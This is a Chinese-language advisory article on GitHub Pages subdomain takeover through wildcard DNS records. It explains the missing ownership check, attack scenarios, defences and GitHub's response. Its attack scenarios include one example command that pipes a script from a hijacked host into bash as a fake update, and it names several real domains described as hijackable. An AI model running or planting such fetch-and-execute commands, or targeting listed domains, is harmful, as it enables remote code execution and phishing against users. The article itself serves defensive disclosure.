GitHub Pages 自定义域名劫持漏洞分析与防范指南<\/h1>

漏洞背景<\/h2>
GitHub Pages 服务允许用户为项目设置自定义域名，但存在一个潜在的安全风险：当用户使用**泛解析<\/strong>（如 `*.example.com<\/code>）将域名指向 GitHub Pages 服务器时，其他 GitHub 用户可能劫持该域名的任意二级域名。<\/p>`**

技术原理<\/h2> 正常解析流程<\/h3> 单独二级域名解析<\/strong>：<\/p> www.deepwn.com => GitHub Page <\/code><\/pre> 用户为特定项目设置自定义域名<\/li> DNS 解析指向 GitHub 服务器<\/li> GitHub 正确显示对应项目内容<\/li> <\/ul> <\/li> 泛解析流程<\/strong>：<\/p> *.deepwn.com => GitHub Page <\/code><\/pre> 所有二级域名都指向 GitHub 服务器<\/li> 未明确绑定的二级域名会显示 GitHub 404 页面<\/li> <\/ul> <\/li> <\/ol> 漏洞产生原因<\/h3> GitHub 服务器不会验证域名所有者身份<\/li> 任何 GitHub 用户都可以将自己的项目部署到任意域名<\/li> 缺乏"双向验证"机制确认域名控制权<\/li> <\/ol> 攻击场景<\/h2> 钓鱼攻击<\/strong>：劫持 login.example.com<\/code> 制作 GitHub 登录钓鱼页面<\/li> 文档篡改<\/strong>：克隆项目文档页面，插入恶意脚本<\/li> 恶意更新<\/strong>：伪造"一键更新"命令： curl -sL http:\/\/patch.example.com\/update.sh | bash <\/span><\/span><\/code><\/pre><\/li> <\/ol> 实际案例<\/h2> 作者在一天内发现了11个可劫持的域名，包括：<\/p> androidx.debayes.dk<\/li> claudiuandrei.com<\/li> crunchbitcoin.com<\/li> hijack.michellerobinscreative.com (作者演示用)<\/li> lit.max.pub<\/li> paulispace.com<\/li> <\/ul> 防范措施<\/h2> 对于GitHub用户<\/h3> 避免使用泛解析<\/strong>：<\/p> 不要设置 *.example.com<\/code> 这样的DNS记录<\/li> 为每个项目单独配置DNS解析<\/li> <\/ul> <\/li> 定期检查<\/strong>：<\/p> 验证所有二级域名是否指向预期项目<\/li> 检查是否有未授权的项目绑定到你的域名<\/li> <\/ul> <\/li> 使用CNAME记录<\/strong>：<\/p> 优先使用CNAME而非A记录<\/li> 确保只解析到你的特定项目<\/li> <\/ul> <\/li> <\/ol> 对于GitHub的建议<\/h3> 实现双向验证<\/strong>机制：<\/p> 要求用户添加TXT记录验证域名所有权<\/li> 类似邮件服务的域名验证方式<\/li> <\/ul> <\/li> 加强警告提示：<\/p> 在设置泛解析时显示明显警告<\/li> 对可疑绑定行为进行提醒<\/li> <\/ul> <\/li> <\/ol> 当前状态<\/h2> GitHub官方已将此问题标记为"超出项目接受范围"，短期内不会修复。目前仅在帮助文档中添加了警告信息： https:\/\/help.github.com\/articles\/troubleshooting-custom-domains\/#unsupported-custom-domain-name<\/a><\/p> POC示例<\/h2> 作者提供了一个概念验证项目： https:\/\/github.com\/deepwn\/GitPageHijack\/<\/a><\/p> 总结<\/h2> 关键安全建议<\/strong>：<\/p> 绝对不要在GitHub Pages中使用泛解析<\/li> 为每个项目单独配置DNS记录<\/li> 定期检查域名解析情况<\/li> 提高安全意识，防范可能的钓鱼攻击<\/li> <\/ol> 通过遵循这些准则，可以显著降低自定义域名被劫持的风险。<\/p>